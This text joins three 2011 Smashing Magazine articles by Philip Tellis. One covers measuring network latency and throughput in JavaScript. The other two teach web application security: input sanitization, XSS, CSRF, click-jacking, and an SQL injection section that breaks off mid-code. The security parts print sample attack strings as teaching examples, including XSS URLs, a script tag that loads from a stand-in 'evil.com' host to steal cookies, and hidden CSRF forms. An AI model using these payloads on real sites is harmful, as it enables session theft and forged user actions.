Analyzing Network Characteristics Using JavaScript And The DOM, Part 1

As Web developers, we have an affinity for developing with JavaScript. Whatever the language used in the back end, JavaScript and the browser are the primary language-platform combination available at the user’s end. It has many uses, ranging from silly to experience-enhancing.


(Image: Viktor Hertz)

In this article, we’ll look at some methods of using JavaScript to determine various network characteristics from within the browser — characteristics that were previously available only to applications that directly interface with the operating system. Much of this was discovered while building the Boomerang project to measure real user performance.

What’s In A Network Anyway?

The network has many layers, but the Web developers among us care most about HTTP, which runs over TCP and IP (otherwise known jointly as the Internet protocol suite). Several layers are below that, but for the most part, whether it runs on copper, fiber or homing pigeons does not affect the layers or the characteristics that we care about.

Network Latency

Network latency is typically the time it takes to send a signal across the network and get a response. It’s also often called roundtrip time or ping time because it’s the time reported by the ping command. While this is interesting to network engineers who are diagnosing network problems, Web developers care more about the time it takes to make an HTTP request and get a response. Therefore, we’ll define HTTP latency as the time it takes to make the smallest HTTP request possible, and to get a response with insignificant server-processing time (i.e. the only thing the server does is send a response).

Cool tip: Light and electricity travel through fiber and copper at about 66% of the speed of light in a vacuum, or 2 × 10⁸ metres per second. A good approximation of network latency between points A and B is four times the time it takes light or electricity to travel the distance. Greg’s Cable Map is a good resource to find out the length and bandwidth of undersea network cables. I’ll leave it to you to put these pieces together.
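
To put those pieces together, here’s a rough back-of-the-envelope sketch in JavaScript (the 6,000 km cable length is purely illustrative):

// Estimate HTTP latency from cable length using the rule of thumb above.
var distance = 6000e3;                         // metres; a made-up cable length
var signalSpeed = 2e8;                         // m/s, about 66% of c
var oneWayMs = distance / signalSpeed * 1000;  // 30ms one way
var latencyMs = 4 * oneWayMs;                  // 4x rule of thumb: ~120ms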

Network Throughput

Network throughput tells us how well a network is being utilized. We may have a 3-megabit network connection but are effectively using only 2 megabits because the network has a lot of idle time.

DNS

DNS is a little different from everything else we care about. It works over UDP and typically happens at a layer that is transparent to JavaScript. We’ll see how best to ascertain the time it takes to do a DNS lookup.

There is, of course, much more to the network, but determining these characteristics through JavaScript in the browser gets increasingly difficult.

Measuring Network Latency With JavaScript

HTTP Get Request

My first instinct was that measuring latency simply entailed sending one packet each way and timing it. It’s fairly easy to do this in JavaScript:

var ts, rtt, img = new Image;
img.onload=function() { rtt=(+new Date - ts) };
ts = +new Date;
img.src="/1x1.gif";

We start a timer, then load a 1 × 1 pixel GIF and measure when its onload event fires. The GIF itself is 35 bytes in size and so fits in a single TCP packet even with HTTP headers added in.

This kinda sorta works, but has inconsistent results. In particular, the first time you load an image, it will take a little longer than subsequent loads — even if we make sure the image isn’t cached. Looking at the TCP packets that go across the network explains what’s happening, as we’ll see in the following section.

TCP Handshake and HTTP Keep-Alive

TCP handshake: SYN / SYN-ACK / ACK

When loading a Web page or image or any other Web resource, a browser opens a TCP connection to the specified Web server, and then makes an HTTP GET request over this connection. The details of the TCP connection and HTTP request are hidden from users and from Web developers as well. They are important, though, if we need to analyze the network’s characteristics.

The first time a TCP connection is opened between two hosts (the browser and the server, in our case), they need to “handshake.” This takes place by sending three packets between the two hosts. The host that initiates the connection (the browser in our case) first sends a SYN packet, which kind of means, “Let’s SYNc up. I’d like to talk to you. Are you ready to talk to me?” If the other host (the server in our case) is ready, it responds with an ACK, which means, “I ACKnowledge your SYN.” And it also sends a SYN of its own, which means, “I’d like to SYNc up, too. Are you ready?” The Web browser then completes the handshake with its own ACK, and the connection is established. The connection could fail, but the process behind a connection failure is beyond the scope of this article.

Once the connection is established, it remains open until both ends decide to close it, by going through a similar handshake.

When we throw HTTP over TCP, we now have an HTTP client (typically a browser) that initiates the TCP connection and sends the first data packet (a GET request, for example). If we’re using HTTP/1.1 (which almost everyone does today), then the default will be to use HTTP keep-alive (Connection: keep-alive). This means that several HTTP requests may take place over the same TCP connection. This is good, because it means that we reduce the overhead of the handshake (three extra packets).

Now, unless we have HTTP pipelining turned on (and most browsers and servers turn it off), these requests will happen serially.

HTTP keep-alive

We can now modify our code a bit to take the time of the TCP handshake into account, and measure latency accordingly.

var t=[], n=2, tcp, rtt;
var ld = function() {
   t.push(+new Date);
   if(t.length > n)
     done();
   else {
     var img = new Image;
     img.onload = ld;
     img.src="/1x1.gif?" + Math.random()
                         + '=' + new Date;
   }
};
var done = function() {
  rtt=t[2]-t[1];
  tcp=t[1]-t[0]-rtt;
};
ld();

With this code, we can measure both latency and the TCP handshake time. There is a chance that a TCP connection was already active and that the first request went through on that connection. In this case, the two times will be very close to each other. In all other cases, rtt, which requires two packets, should be approximately 66% of tcp, which requires three packets. Note that I say “approximately,” because network jitter and different routes at the IP layer can make two packets in the same TCP connection take different lengths of time to get through.

You’ll notice here that we’ve ignored the fact that the first image might have also required a DNS lookup. We’ll look at that in part 2.

Measuring Network Throughput With JavaScript

Again, our first instinct with this test was just to download a large image and measure how long it takes. Then size/time should tell us the throughput.

For the purpose of this code, let’s assume we have a global object called image, with details of the image’s URL and size in bits.

// Assume global object
// image={ url: …, size: … }
var ts, rtt, bw, img = new Image;
img.onload=function() {
   rtt=(+new Date - ts);
   bw = image.size/rtt;    // bits / milliseconds = kilobits per second
};
ts = +new Date;
img.src=image.url;

Once this code has completed executing, we should have the network throughput in kilobits per second stored in bw.

Unfortunately, it isn’t that simple, because of something called TCP slow-start.

Slow-Start

In order to avoid network congestion, both ends of a TCP connection will start sending data slowly and wait for an acknowledgement (an ACK packet). Remember that an ACK packet means, “I ACKnowledge what you just sent me.” Every time the sender receives an ACK without timing out, it assumes that the other end can operate faster and will send out more packets before waiting for the next ACK. If an ACK doesn’t come through in the expected timeframe, it assumes that the other end cannot operate fast enough and so backs off.

TCP window sizes for slow-start

This means that our throughput test above would have been fine as long as our image is small enough to fit within the current TCP window, which at the start is set to 2 segments. While this is fine for slow networks, a fast network really wouldn’t be taxed by so small an image.

Instead, we’ll try sending across images of increasing size and measuring the time each takes to download.

For the purpose of the code, the global image object is now an array with the following structure:

var image = [
	{url: …, size: … }
];

An array makes it easy to iterate over the list of images, and we can easily add large images to the end of the array to test faster network connections.

var i=0;
var ld = function() {
   if(i > 0)
      image[i-1].end = +new Date;
   if(i >= image.length)
      done();
   else {
      var img = new Image;
      img.onload = ld;
      image[i].start = +new Date;
      img.src=image[i].url;
   }
   i++;
};

Unfortunately, this breaks down when a very slow connection hits one of the bigger images; so, instead, we add a timeout value for each image, designed so that we hit upon common network connection speeds quickly. Details of the image sizes and timeout values are listed in this spreadsheet.

Our code now looks like this:

var i=0;
var ld = function() {
   if(i > 0) {
      image[i-1].end = +new Date;
      clearTimeout(image[i-1].timer);
   }
   if(i >= image.length ||
         (i > 0 && image[i-1].expired))
      done();
   else {
      var img = new Image;
      img.onload = ld;
      image[i].start = +new Date;
      // capture the current index in a closure;
      // i will have moved on by the time the timer fires
      image[i].timer = (function(j) {
            return setTimeout(function() {
                       image[j].expired = true;
                    }, image[j].timeout);
         }(i));
      img.src=image[i].url;
   }
   i++;
};

This looks much better — and works much better, too. But we’d still see a lot of variance between multiple runs. The only way to reduce the error in measurement is to run the test multiple times and take a summary value, such as the median. It’s a tradeoff between how accurate you need to be and how long you want the user to wait before the test completes. Getting network throughput to an order of magnitude is often as close as you need to be. Knowing whether the user’s connection is around 64 Kbps or 2 Mbps is useful, but determining whether it’s exactly 2048 or 2500 Kbps is much less useful.
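
As a sketch of that summarization step (the helper function here is mine, not Boomerang’s):

// Run the throughput test several times and report the median value.
function median(values) {
   var sorted = values.slice(0).sort(function(a, b) { return a - b; });
   var mid = Math.floor(sorted.length / 2);
   return sorted.length % 2 ? sorted[mid]
                            : (sorted[mid - 1] + sorted[mid]) / 2;
}
// e.g. median([2048, 1900, 2500, 2200, 2100]) === 2100   (Kbps)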

Summary And References

That’s it for part 1 of this series. We’ve looked at how the packets that make up a Web request get through between browser and server, how this changes over time, and how we can use JavaScript and a little knowledge of statistics to make educated guesses at the characteristics of the network that we’re working with.

In the next part, we’ll look at DNS, the difference between IPv6 and IPv4, and the WebTiming API. We’d love to know what you think of this article and what you’d like to see in part 2, so let us know in a comment.

Until then, here’s a list of links to resources that were helpful in compiling this document.



© Philip Tellis for Smashing Magazine, 2011.


Keeping Web Users Safe By Sanitizing Input Data


In my last article, I spoke about several common mistakes that show up in web applications. Of these, the one that causes the most trouble is insufficient input validation/sanitization. In this article, I’m joined by my colleague Peter (evilops) Ellehauge in looking at input filtering in more depth while picking on a few real examples that we’ve seen around the web. As you’ll see from the examples below, insufficient input validation can result in various kinds of code injection including XSS, and in some cases can be used to phish user credentials or spread malware.

To start with, we’ll take an example[1] from one of the most discussed websites today. This example is from a site that hosts WikiLeaks material. Note that the back end code presented is not the actual code, but what we think it might be based on how the exploit works. The HTML was taken from their website. We think it’s fair to assume that it’s written in PHP as the form’s action is index.php.

<form method='get' action='index.php'>
<input name="search" value="<?php echo $_GET['search'];?>" />
<input type=submit name='getdata' value='Search' /></form>

In this code, the query string parameter search is echoed back to the user without sanitization. An attacker could email or IM unsuspecting users a crafted URL that escapes out of the <input> and does nasty things with JavaScript. A simple way to test for this exploit without doing anything malicious is to use a URL like this:

http://servername/index.php?search="><script>alert(0)</script>

This exploit works because PHP has no default input filtering, and the developers haven’t done any of their own filtering. This exploit would work just as well in most other programming languages as most of them also lack default input filtering. A safer way to write the above code is as follows:

<?php
// filter_input() takes a single input type; the form submits via GET
$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
?>
<form method='get' action='index.php'>
<input name="search" value="<?php echo $search;?>" />
<input type=submit name='getdata' value='Search' /></form>

This is less convenient though and requires code for every input parameter used, so it is often a good choice to set special_chars as PHP’s default filter, and then override when required. We do this in PHP’s ini file with the following directive:

filter.default="special_chars"

We’re not aware of similar default filters in other languages, but if you know of any, let us know in the comments.

It’s important to note that simply adding this parameter to PHP’s ini file does not automatically make your application secure. This only takes care of the default case where an input parameter is echoed back in an HTML context. However, a web page contains many different contexts and each of these contexts requires input to be validated in a different way.

Is input validation enough?

Recently we’ve stumbled upon the following code:

<?php
$name = "";
if (isset($_GET['name'])) {
    $name = filter_input(INPUT_GET, 'name', FILTER_SANITIZE_SPECIAL_CHARS);
}
echo "<a href=login?name=$name>login</a>";
?>

The developer correctly applies input filtering, and this code was reviewed and made live. However, something small seems to have slipped through. The developer hasn’t used quotes around the value of the href attribute, so the browser assumes that its value extends up to the first white-space character. A crafted URL demonstrates the problem:


http://servername/login.php?name=foo+onmouseover=alert(/bar/)

All of the characters in name are safe and pass through the filter untouched, but the resulting HTML looks like this:

<a href=login?name=foo onmouseover=alert(/bar/)>login</a>

The lack of quotes turns the attribute value into an onmouseover event handler. When the unsuspecting user mouses over the link to click on login, the onmouseover handler triggers. Quoting the value of the href attribute fixes the problem here. This is a good enough reason to quote all attribute values, even though quotes are optional according to the HTML spec.

<?php
$name = "";
if (isset($_GET['name'])) {
    $name = filter_input(INPUT_GET, 'name', FILTER_SANITIZE_SPECIAL_CHARS);
}
echo "<a href=\"login?name=$name\">login</a>";
?>

For this particular situation though, we also need to look at context. The href attribute accepts a URL as its value, so the value passed to it needs to be urlencoded as well as quoted.
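
A sketch of what that might look like, reusing the example above (urlencode() handles the URL context, and htmlspecialchars() handles the quoted-attribute context around it):

<?php
$name = "";
if (isset($_GET['name'])) {
    // encode for the URL first, then for the HTML attribute that carries it
    $name = htmlspecialchars(urlencode($_GET['name']), ENT_QUOTES);
}
echo "<a href=\"login?name=$name\">login</a>";
?>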

(Image: SQL injection comic; full image at xkcd)

Commonly overlooked sections

While many web developers correctly quote and validate input in page content, we find that some sections of the page are still overlooked, possibly because they aren’t perceived to be a problem, or perhaps they’ve just been missed. Here is an example from a dictionary web site:

<title><?php echo $word; ?> - Definitions and more ...</title>

Now by default, no browser executes code within the title tags, so the developer probably thought that it was safe to display data untreated in the title. Carefully crafted input data, though, can escape the title tags and inject script with something like this:


http://servername/dictionary?word=</title><script>alert(/xss/)</script>

Other commonly overlooked pages are error pages and error messages. Does your 404 page echo on screen the incorrect URL that was typed in? If it does, then it needs to treat that input first. A banking website recently had code similar to the following[2] (they used ASP in this case):

<%
if Request.Querystring("errmsg") then
    Response.Write("<em>" & Request.QueryString("errmsg") & "</em>")
end if
%>

The errmsg parameter didn’t come in from a form, but from a server-side redirect. The developers assumed that since this URL came from the server it would be safe.

Ads/analytics sections at the bottom of a page are also frequently not handled correctly, perhaps because boilerplate code is provided and it just works. As the following example from a travel site shows, you should not trust anyone, and that includes boilerplate code:

<script type="text/javascript">
google_afs_query = "<?php echo $_GET['query'];?>";
.
.
</script>

This is vulnerable to the following attack string:

http://servername/?query=";alert(0)//

In this case input data needs to be validated for use in a JavaScript context since that’s where the data is echoed out to. What meta-characters would you scan for in this case? Would you quote them or strip them? The answer depends on context, and only you the developer or owner of the page know what the right context is.

Different contexts

Now, as we mentioned earlier, input may be used in different contexts, and it needs to be treated differently depending on the context that it will be used in. Sometimes data will be used in multiple contexts and may need to be treated differently for each case. Let’s look at a few cases.

HTML Context

In an HTML context, data is written into an HTML page as part of the content, for example inside a <p> tag. Examples include a search results page, a blog commenting system, dictionary.com’s word of the day, etc. In this context, all HTML meta characters need to be encoded or stripped. That’s primarily < and >, but using PHP’s FILTER_SANITIZE_SPECIAL_CHARS is probably safer, and FILTER_SANITIZE_STRIPPED is probably the safest. Make sure you know what character set your data is in before you try to encode it.
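
To make the filter’s effect concrete, here’s a tiny sketch:

<?php
// FILTER_SANITIZE_SPECIAL_CHARS HTML-encodes quotes, <, >, & and
// characters with an ASCII value below 32
echo filter_var('<script>alert(0)</script>', FILTER_SANITIZE_SPECIAL_CHARS);
// prints: &#60;script&#62;alert(0)&#60;/script&#62;
?>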

There may be cases when you want to allow some HTML tags, for example in a CMS tool or a commenting system. This is generally a bad idea because there are more ways to get it wrong than to get it right. For example, let’s say that your blogging system allows commenters to markup their comments with some simple tags like <q> and <em>. Now a happy commenter comes along and adds the following code to his comment:

<q onmouseover="alert('xss')">...</q>

You’ve just been XSSed. If you are going to allow a subset of tags, then strip all attributes from those tags. A better idea is to use a CMS specific syntax like BBCode that your back end can translate into safe tags.
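
A minimal sketch of that BBCode idea, supporting just the two tags from the example (a real system would use a tested library):

<?php
function bbcode_to_html($text) {
    // encode everything first so no raw HTML survives...
    $text = htmlspecialchars($text, ENT_QUOTES);
    // ...then translate a whitelist of BBCode tags into attribute-free HTML
    $text = preg_replace('/\[q\](.*?)\[\/q\]/s', '<q>$1</q>', $text);
    $text = preg_replace('/\[em\](.*?)\[\/em\]/s', '<em>$1</em>', $text);
    return $text;
}
?>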

Attribute Context

In attribute context, user data is included as the attribute value of an HTML tag. Depending on the attribute in question, the context might be different. For non-event handlers, all HTML meta characters need to be encoded. FILTER_SANITIZE_SPECIAL_CHARS works here as well. In addition, all attribute values should be quoted using single or double quotes or you’ll be hit like the examples above.

For event handling attributes like onmouseover, onclick, onfocus, onblur or similar, you need to be more careful. The best advice is to never ever put input data directly into an event handler. Let’s look at an example.

<?php
  $n = filter_input(INPUT_GET, 'n', FILTER_SANITIZE_SPECIAL_CHARS);
?>
<input type="text" value="" name="n" onfocus="do_something('<?php echo $n; ?>');">

Looks safe, doesn’t it? What happens if an attacker tries to get out of the quoted region using a single quote, i.e., they use a URL like


http://servername/?n=foo');alert('xss

The input is sanitized and all single quotes are converted to &#39;. Unfortunately, this isn’t enough. An event handler executes in two contexts one after the other. The data in the page is first HTML decoded and the result is passed into a JavaScript context. So, as far as the JavaScript handler is concerned, ' and &#39; are exactly the same and this introduces an XSS hole.

The best thing to do is to never pass input data directly into an event handler — even if it has been treated. It’s better to store it as the value of a hidden field and then let your handler pull the value out of that field. Something like this would be safer:

<?php
  $n = filter_input(INPUT_GET, 'n', FILTER_SANITIZE_SPECIAL_CHARS);
?>
<input type="hidden" id="old_n" value="<?php echo $n ?>">
<input type="text" value="" name="n" onfocus="do_something(document.getElementById('old_n').value);">

URL Context

A special case of the attribute context is URL context. The value of the href and src attributes of various elements are URLs and need to be treated as such. Special characters included in a URL need to be urlencoded to be safe in this context. Using an HTML specific filter is insufficient here as we’ve seen in the missing quotes example above.

Also take note of URLs in meta tags and in HTTP headers. For example, code similar to the following was also recently seen online:

<?php
  if (preg_match('!^https?://(\w+)\.mysite\.com/!', $_GET['done'])) {
      header("Location: " . $_GET['done']);
  }
?>

On the face of it, it looks safe enough since we’re checking that the done parameter matches our domain before we redirect, however we aren’t validating the entire URL. An attacker could easily slip in a newline character and then add more headers, for example, a second Location header, or an entire HTML document for that matter. All it takes is a little %0a in the done parameter.

Notice that the match uses a / after .com. This is necessary to protect against user@host style URLs and third-party subdomains. For example, a malicious user could create a subdomain called www.mysite.com.evil.com and trick your regex. Alternatively, they could use a URL like http://www.mysite.com@www.evil.com/ to the same effect.

If your URL contains only ASCII characters, then PHP’s FILTER_VALIDATE_URL filter can be used instead of funky regular expressions.
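
A safer version of the redirect above might combine both checks (a sketch, not a drop-in fix):

<?php
// FILTER_VALIDATE_URL should reject a value containing a raw newline,
// which blocks the header-injection trick; the starts-with match
// (with its trailing /) then pins the redirect to our own domain
$done = filter_input(INPUT_GET, 'done', FILTER_VALIDATE_URL);
if ($done && preg_match('!^https?://(\w+)\.mysite\.com/!', $done)) {
    header("Location: " . $done);
}
?>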

Remember: when writing out URLs, the & character is special in HTML, so it needs to be written out as &amp; (although most browsers will accept it if you don’t), while the ; character is special in an HTTP header, meaning that &amp; will break the header.

When dealing with URLs, figure out which context the URL will be used in, encode it correctly and possibly check the domain. When checking the domain, make sure you use a starts-with match, and include the trailing / to protect against user@host style URLs.

JavaScript Context

If input data needs to be written out in a JavaScript context, i.e., within <script> tags or in a file served as the src attribute of a <script> tag, the data should be JSON encoded. In PHP, the json_encode function can be used. The JSON homepage has a list of JSON libraries for many other languages, all of which have a similar function.

Simply escaping quotes using addslashes or something similar is insufficient, because within script tags quotes can also be represented by their HTML entity values.
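
For example, the vulnerable travel-site snippet from earlier could be rewritten like this (a sketch):

<script type="text/javascript">
// json_encode() adds the surrounding quotes and escapes quotes, backslashes
// and forward slashes, so data cannot break out of the string or close the
// script block; the attack string ";alert(0)// comes out as harmless data
google_afs_query = <?php echo json_encode($_GET['query']); ?>;
</script>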

One special case to think about in the JavaScript context is the use of web services that return JSON-P data. You do this on your web page by including a script tag that points to a web service and specifying a callback function to be called when the data is loaded. For example, to load public photos from Flickr, you’d use something like this:

<script src="http://api.flickr.com/services/feeds/photos_public.gne?format=json&jsoncallback=myfunc"></script>

Before you do that, you’d define myfunc in JavaScript. However, what you’re doing is giving the script from Flickr full access to your page’s DOM. As long as the script respects its contract with you (i.e., the API), you should be safe, but if whoever controlled that script were to suddenly turn evil, you’ve just opened your users up to attack.

In general, only point your script tags to URLs that you fully trust, both to not be evil and also to never be compromised themselves. If you must include untrusted scripts, consider sandboxing them in an iframe or use Caja if you can. If you do use an iframe, then consider that there may be certain conditions under which you need to use a double iframe. This is primarily done to prevent referrer leaking if your page’s URL itself is secret, like a search results page or a capability URL.

CSS Context

Internet Explorer is the only major browser around that allows script execution within CSS using the expression syntax (deprecated and no longer supported in IE8 and later). However, that’s still reason enough to worry about it. As an example, consider a website that allows users to customize the background of their profile pages, similar to MySpace or Twitter (note that neither website is vulnerable to this flaw). Let’s say that you accept a background color and/or image and assign that to the CSS background property. If you don’t correctly validate and sanitize the values passed in by the user, they could pass in a JavaScript expression instead of a real color. This might result in CSS code like this:

background: #28d expression("alert('xss')");

Making sure the background color the user specifies is a valid CSS color and nothing else will protect you from this kind of an attack.

With URLs, a different issue may come into play. Let’s say that you allow the user to specify their own background image URL. You validate this URL when the user specifies it — to make sure it doesn’t return a 404 error. After this is done, the user could replace the URL with a script that returns a 401 HTTP status code. This makes the browser throw up an authentication dialog, which might confuse the user into entering their username and password for your site. An interesting attack that we haven’t seen outside of the lab.

The fix is to download the specified image to your own server and run some kind of transformation on it, most commonly for size. Even if your transformation changes nothing visible, re-encoding the image can still remove malware that may be embedded in a JPEG.

Other Contexts

There are other contexts that we don’t look at in this article. These commonly deal with the back end and include things like an SQL context or a Shell context or a back end web service context. Another interesting attack that results from improper input validation is HTTP Parameter Pollution or HPP for short.

Should you filter on input or output?

The comments of my last article brought up an interesting point regarding whether data should be filtered on input or output. Since we have so many different contexts, it seems obvious that data should be filtered just before output depending on the context. Filtering for the wrong context could still introduce vulnerabilities. This is the ideal case where every programmer on your team knows what they are doing at all times and always programs with security in mind. In practice, this doesn’t always happen. Even experienced programmers have been known to slip up once or twice, and it’s those occasions that come back to bite you.

A simple guideline is to strip out all punctuation by default and let the web developer override this based on context. This means that using untreated input will either be safe, or not work at all, which serves as a reminder to the developer that they need to think about context. We encourage developers to validate data on input. This involves checking data types, ranges, lengths and possibly the character set/encoding in use. The purpose of validation is to make sure that we receive what we expect to receive. Data should be further sanitized on output depending on context. Sanitization involves transforming (possibly destructively) the data to be safe in the output context. Remember that sometimes a single piece of data may be used in multiple contexts on the same page.

Both validation and sanitization are types of filters to be run on input data, and often both might be required.

In closing

No data that comes in from an untrusted source should be trusted. This would include anything that you did not create yourself. The data may come in as command line parameters, through a query string, through POST data, cookies, HTTP headers, a web service call, an uploaded file, or anything else. If you did not create it, then it can’t be trusted. Validate all data to make sure it’s what you expect, and then treat it to make sure it’s safe in the context where it will be used. Be aware of the different contexts within a web page and keep your users safe.

References

  1. Cablegate security vulnerability
  2. XSS on ICICIDirect
  3. Cross site scripting in CSS
  4. PHP’s input validation and sanitization filters
  5. The Caja Project
  6. Capability based security
  7. HTTP Parameter Pollution
  8. HTTP 4xx status codes
  9. JPEG exploit beats antivirus software



© Philip Tellis for Smashing Magazine, 2011.


Common Security Mistakes in Web Applications


Web application developers today need to be skilled in a multitude of disciplines. It’s necessary to build an application that is user friendly, highly performant, accessible and secure, all while executing partially in an untrusted environment that you, the developer, have no control over. I speak, of course, about the User Agent. Most commonly seen in the form of a web browser, but in reality, one never really knows what’s on the other end of the HTTP connection.

There are many things to worry about when it comes to security on the Web. Is your site protected against denial of service attacks? Is your user data safe? Can your users be tricked into doing things they would not normally do? Is it possible for an attacker to pollute your database with fake data? Is it possible for an attacker to gain unauthorized access to restricted parts of your site? Unfortunately, unless we’re careful with the code we write, the answer to these questions can often be one we’d rather not hear.

We’ll skip over denial of service attacks in this article, but take a close look at the other issues. To be more conformant with standard terminology, we’ll talk about Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Phishing, Shell injection and SQL injection. We’ll also assume PHP as the language of development, but the problems apply regardless of language, and solutions will be similar in other languages.


1. Cross-site scripting (XSS)

Cross-site scripting is an attack in which a user is tricked into executing code from an attacker’s site (say evil.com) in the context of our website (let’s call it www.mybiz.com). This is a problem regardless of what our website does, but the severity of the problem changes depending on what our users can do on the site. Let’s look at an example.

Let’s say that our site allows the user to post cute little messages for the world (or maybe only their friends) to see. We’d have code that looks something like this:

<?php
  echo "$user said $message";
?>

To read the message in from the user, we’d have code like this:

<?php
  $user = $_COOKIE['user'];
  $message = $_REQUEST['message'];
  if($message) {
     save_message($user, $message);
  }
?>
<input type="text" name="message" value="<?php echo $message ?>">

This works only as long as the user sticks to messages in plain text, or perhaps a few safe HTML tags like <strong> or <em>. We’re essentially trusting the user to only enter safe text. An attacker, though, may enter something like this:

Hi there...<script src="h++p://evil.com/bad-script.js"></script>

(Note that I’ve changed http to h++p to prevent auto-linking of the URL).

When a user views this message on their own page, they load bad-script.js into their page, and that script could do anything it wanted, for example, it could steal the contents of document.cookie, and then use that to impersonate the user and possibly send spam from their account, or more subtly, change the contents of the HTML page to do nasty things, possibly installing malware onto the reader’s computer. Remember that bad-script.js now executes in the context of www.mybiz.com.

This happens because we’ve trusted the user more than we should. If, instead, we only allow the user to enter contents that are safe to display on the page, we prevent this form of attack. We accomplish this using PHP’s filter extension.

We can change our PHP code to the following:

<?php
  $user = filter_input(INPUT_COOKIE, 'user',
                         FILTER_SANITIZE_SPECIAL_CHARS);
  // filter_input() takes a single input type, so to accept the message
  // via either GET or POST (as $_REQUEST does above), filter $_REQUEST
  // directly with filter_var()
  $message = isset($_REQUEST['message'])
               ? filter_var($_REQUEST['message'],
                            FILTER_SANITIZE_SPECIAL_CHARS)
               : null;
  if($message) {
     save_message($user, $message);
  }
?>
<input type="text" name="message" value="<?php echo $message ?>">

Notice that we run the filter on the input and not just before output. We do this to protect against the situation where a new use case may arise in the future, or a new programmer comes in to the project, and forgets to sanitize data before printing it out. By filtering at the input layer, we ensure that we never store unsafe data. The side-effect of this is that if you have data that needs to be displayed in a non-web context (e.g. a mobile text message/pager message), then it may be unsuitably encoded. You may need further processing of the data before sending it to that context.

Now chances are that almost everything you get from the user is going to be written back to the browser at some point, so it may be best to just set the default filter to FILTER_SANITIZE_SPECIAL_CHARS by changing filter.default in your php.ini file.

PHP has many different input filters, and it’s important to use the one most relevant to your data. Very often an XSS creeps in because we use FILTER_SANITIZE_SPECIAL_CHARS when we should have used FILTER_SANITIZE_ENCODED or FILTER_SANITIZE_URL or vice-versa. You should also carefully review any code that uses something like html_entity_decode, because this could potentially open your code up for attack by undoing the encoding added by the input filter.

If a site is open to XSS attacks, then its users’ data is not safe.

2. Cross-site request forgery (CSRF)

A CSRF (sometimes abbreviated as XSRF) is an attack where a malicious site tricks our visitors into carrying out an action on our site. This can happen if a user logs in to a site that they use a lot (e.g. e-mail, Facebook, etc.), and then visits a malicious site without first logging out. If the original site is susceptible to a CSRF attack, then the malicious site can do evil things on the user’s behalf. Let’s take the same example as above.

Since our application reads in input either from POST data or from the query string, an attacker could trick our user into posting a message by including code like this on their website:

<img src="h++p://www.mybiz.com/post_message?message=Cheap+medicine+at+h++p://evil.com/"
     style="position:absolute;left:-999em;">

Now all the attacker needs to do, is get users of mybiz.com to visit their site. This is fairly easily accomplished by, for example, hosting a game, or pictures of cute baby animals. When the user visits the attacker’s site, their browser sends a GET request to www.mybiz.com/post_message. Since the user is still logged in to www.mybiz.com, the browser sends along the user’s cookies, thereby posting an advertisement for cheap medicine to all the user’s friends.

Simply changing our code to only accept submissions via POST doesn’t fix the problem. The attacker can change the code to something like this:

<iframe name="pharma" style="display:none;"></iframe>
<form id="pform"
      action="h++p://www.mybiz.com/post_message"
      method="POST"
      target="pharma">
<input type="hidden" name="message" value="Cheap medicine at ...">
</form>
<script>document.getElementById('pform').submit();</script>

Which will POST the form back to www.mybiz.com.

The correct way to protect against a CSRF is to use a single-use token tied to the user. This token can only be issued to a signed-in user, and is based on the user’s account, a secret salt and possibly a timestamp. When the user submits the form, this token needs to be validated. This ensures that the request originated from a page that we control. This token only needs to be issued when a form submission can do something on behalf of the user, so there’s no need to use it for publicly accessible read-only data. The token is sometimes referred to as a nonce.

There are several different ways to generate a nonce. For example, have a look at the wp_create_nonce, wp_verify_nonce and wp_salt functions in the WordPress source code. A simple nonce may be generated like this:

<?php
function get_nonce() {
  // $salt and $user are assumed to be available in this scope
  return md5($salt . ":"  . $user . ":"  . ceil(time()/86400));
}
?>

The timestamp we use is the current time to an accuracy of 1 day (86400 seconds), so it’s valid as long as the action is executed within a day of requesting the page. We could reduce that value for more sensitive actions (like password changes or account deletion). It doesn’t make sense to have this value larger than the session timeout time.

An alternate method might be to generate the nonce without the timestamp, but store it as a session variable or in a server side database along with the time when the nonce was generated. That makes it harder for an attacker to generate the nonce by guessing the time when it was generated.

<?php
function get_nonce() {
  $nonce = md5($salt . ":"  . $user);
  $_SESSION['nonce'] = $nonce;
  $_SESSION['nonce_time'] = time();
  return $nonce;
}
?>

We use this nonce in the input form, and when the form is submitted, we regenerate the nonce or read it out of the session variable and compare it with the submitted value. If the two match, then we allow the action to go through. If the nonce has timed out since it was generated, then we reject the request.

<?php
  if(!verify_nonce($_POST['nonce'])) {
     header("HTTP/1.1 403 Forbidden", true, 403);
     exit();
  }
  // proceed normally
?>

This protects us from the CSRF attack since the attacker’s website cannot generate our nonce.
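
The verify_nonce() used above isn’t defined in this article; a minimal sketch matching the first get_nonce() variant might look like this (like get_nonce(), it assumes $salt and $user are in scope):

<?php
function verify_nonce($nonce) {
  // regenerate the nonce the way get_nonce() did, and also accept the
  // previous day's value so a form loaded just before the day rolls
  // over still validates when submitted
  $now = time();
  return $nonce === md5($salt . ":" . $user . ":" . ceil($now/86400))
      || $nonce === md5($salt . ":" . $user . ":" . ceil(($now - 86400)/86400));
}
?>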

If you don’t use a nonce, your user can be tricked into doing things they would not normally do. Note that even if you do use a nonce, you may still be susceptible to a click-jacking attack.

3. Click-jacking

While not on the OWASP top ten list for 2010, click-jacking has gained recent fame due to attacks against Twitter and Facebook, both of which spread very quickly due to the social nature of these platforms.

Now since we use a nonce, we’re protected against CSRF attacks. However, if the user is tricked into clicking the submit link themselves, then the nonce won’t protect us. In this kind of attack, the attacker includes our website in an iframe on their own website. The attacker doesn’t have control over our page, but they do control the iframe element. They use CSS to set the iframe’s opacity to 0, and then use JavaScript to move it around such that the submit button is always under the user’s mouse. This was the technique used in the Facebook Like button click-jack attack.

Frame busting appears to be the most obvious way to protect against this; however, it isn’t foolproof. For example, adding the security="restricted" attribute to an iframe will stop any frame-busting code from working in Internet Explorer, and there are ways to prevent frame busting in Firefox as well.

A better way might be to make your submit button disabled by default and then use JavaScript to enable it once you’ve determined that it’s safe to do so. In our example above, we’d have code like this:

<input type="text" name="message" value="<?php echo $message ?>">
<input id="msg_btn" type="submit" disabled="true">
<script type="text/javascript">
if(top == self) {
   document.getElementById("msg_btn").disabled=false;
}
</script>

This way we ensure that the submit button cannot be clicked on unless our page runs in a top level window. Unfortunately, this also means that users with JavaScript disabled will also be unable to click the submit button.

4. SQL injection

In this kind of an attack, the attacker exploits insufficient input validation to execute arbitrary SQL queries against your database. XKCD has a humorous take on SQL injection:

(Image: SQL injection comic; full image at xkcd)

Let’s go back to the example we have above. In particular, let’s look at the save_message() function.

<?php
function save_message($user, $message)
{
